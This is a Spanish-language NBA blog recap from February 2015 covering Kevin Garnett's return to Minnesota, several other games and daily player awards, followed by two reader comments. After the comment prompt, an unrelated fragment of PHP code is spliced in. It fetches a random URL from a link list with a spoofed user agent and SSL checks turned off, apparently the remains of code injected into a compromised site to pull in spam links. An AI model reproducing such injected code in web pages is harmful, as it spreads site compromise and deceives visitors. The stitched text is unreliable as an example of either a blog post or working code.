La Crónica: Welcome Back!

26 de February de 2015 por txusma

Washington Wizards 77 – Minnesota Timberwolves 97

En condiciones normales no prestaríamos tanta atención a este partido pero es que lo de ayer no era condiciones normales. Ayer volvía a Minnesota Kevin Garnett, el mejor jugador (con diferencia de la historia de la franquicia, un hombre capaz de irradiar tanta energía que la podemos detectar claramente viendo un video de Youtube, una persona que ha de ser (y nos consta que ya es) referente para los jóvenes que ahora pueblan el equipo. El público recibió a Garnett con la mejor de sus ovaciones y Flip Saunders le introdujo en el quinteto titular sin pensarlo un segundo. Al principio sus compañeros parecieron cohibidos y nerviosos y los Wizards se fueron de hasta 15 puntos en la mitad del primer cuarto. Pero a partir de ahí todo cambió y sobretodo tras la reanudación, con Garnett de vuelta a parqué, los Wolves destrozaron a los visitantes con Kevin Martin como brazo ejecutor y Ricky Rubio y Andrew Wiggins formando una sociedad perfecta. Lo que ahora mismo es alegría en Minnesota, resulta tristeza y desconcierto en Washington: 5 derrota consecutiva, sólo 2 victorias en los últimos 10 partidos, John Wall en una baja forma alarmante… Lo PO no peligran pero cualquiera de estos días los Bucks les pasan en la clasificación. 

LA Clippers 105 – Houston Rockets 110 

Sin Blake Griffin los Clippers empiezan y acaban en Chris Paul. Sin él en pista se convierten en un equipo ramplón y previsible y su juego dista mucho de ser fluido. Por eso, el ex de Wake Forest ha de jugarse 39 minutazos nada menos. De todas maneras el partido corrió igualado justo hasta el último cuarto en el que el banquillo de los Rockets con Corey Brewer a la cabeza endosó a los Clippers un parcial de 15-1 que prácticamente mató el partido. Los Clippers llegaron a ponerse a 4 puntos a falta de 38 segundos pero ya no llegaron a tiempo. Esta victoria deja a los Rockets terceros a solo dos victorias de los Grizzlies y sextos a los Clippers.

San Antonio Spurs 95 – Portland Trailblazers 111

Sigue el “Rodeo Road Trip” y siguen las derrota para los Spurs. 4ª consecutiva, nada menos. Decía Tim Duncan al término del partido que les está faltando consistencia (una palabra que yo pensaba que iba unida al término Spurs cuando la buscabas en el diccionario). Buena prueba de ello es que las 5 primeras canastas de los suyos fueron obra del mismo Duncan mientras que en ese intervalo sus compañeros fallaron las 7 que intentaron… Otra prueba puede ser que los Blazers llegaron a escaparse de 19 puntos en la primera parte pero al descanso el marcador lucía un empate. Demasiada irregularidad. Tras la reanudación los locales se pusieron las pilas y consiguieron 10 puntos de ventaja al término del tercer cuarto que supieron administrar a la perfección en el último con 16 puntos de Wesley Matheews. ¿Alguien duda de que los Spurs van camino de acabar octavos? Steve Kerr se troncha de risa en su casa.

El resto de la jornada

Las espadas siguen en todo lo alto en los diferentes frentes abierto en la clasificación. En el Oeste, los Pelicans se resisten a abandonar la lucha por los PO y encadenaron su tercera victoria consecutiva ante los Nets a pesar de jugar de nuevo sin Anthony Davis. También ganaron los Suns (a los Nuggets) rompiendo así su racha de 5 derrotas consecutivas. La adquisición de Brandon Knight empieza a dar sus réditos. En la parte alta, sorprendente derrota de unos Grizzlies algo desquiciados en Sacramento. Zach Randolph y Demarcus Cousins se las tuvieron en el tercer cuarto pero la cosa no pasó a mayores. También en el Oeste, buena victoria de los Lakers en Utah ante unos Jazz que venían lanzados. El rookie Jordan Clarkson lideró a los suyos.

En el Este, victoria de los Heat en Orlando en la prórroga que les mantiene séptimos. Octavos son los Nets que, como ya hemos dicho, cayeron ante los Pelicans; novenos los Charlotte Hornets que asaltaron el United Center de Chicago aprovechando que los locales parecían algo tocados por la nueva lesión de Derrick Rose; décimos son los Pacers que no jugaron ayer, y undécimos los Celtics que se impusieron con facilidad a unos Knicks que dan algo más que pena. Los Bucks tienen en el punto de mira la quinta posición de los Wizards gracias a su victoria frente los Sixers.

Y en un duelo interconferencias, convincente victoria de los Hawks ante unos Mavericks que jugaron sin Rajon Rondo, suspendido un partido por “intercambiar impresiones” con su entrenador.

PREMIOS

MVP: Premio repartido para un par de no habituales. Por un lado Rudy Gay y sus 28 puntos, 5 rebotes y 6 asistencias. Por el otro Wesley Matheews y sus 31 puntos, 5 rebotes, 3 asistencias y 3 robos. Ambos fueron claves en las respectivas victorias de sus equipos.

Rookie: Exhibición de Jordan Clarkson ante los Jazz. Anotó 23 puntos con un 10 de 16 en TC. En Boston Marcus Smart también tuvo un buen día de cara al aro: 16 puntos en un 6 de 9.

Sorpresa: Will Barton, jugador de los Denver Nuggets desde hacer unos días, va ganando protagonismo en su actual equipo. Ayer jugó 34 minutos en los que anotó 28 puntos y capturó 8 rebotes. Y el mejor de los Pelicans fue Quincy Pondexter con 25 puntos.

Decepción: No está pasando por un buen momento John Wall (7 puntos con un 2 de 10 en TC) pero peor parece estar Tony Parker. El de los Spurs sólo anotó 2 puntos tras fallar 7 de sus 8 lanzamientos a canasta.

Esfuerzo en vano: DeAndre Jordan recogió 19 rebotes y anotó 22 puntos y Pau Gasol cogió 13 rebotes, anotó 25 puntos y puso 4 tapones. De todas maneras tanto Clippers como Bulls perdieron sus partidos.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Charlotte HORNETS! 😛

      Citar

  2. Txusma dice:
    #2

    Jose Luis:
    Charlotte HORNETS!

    No aprendo, es que no aprendo!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>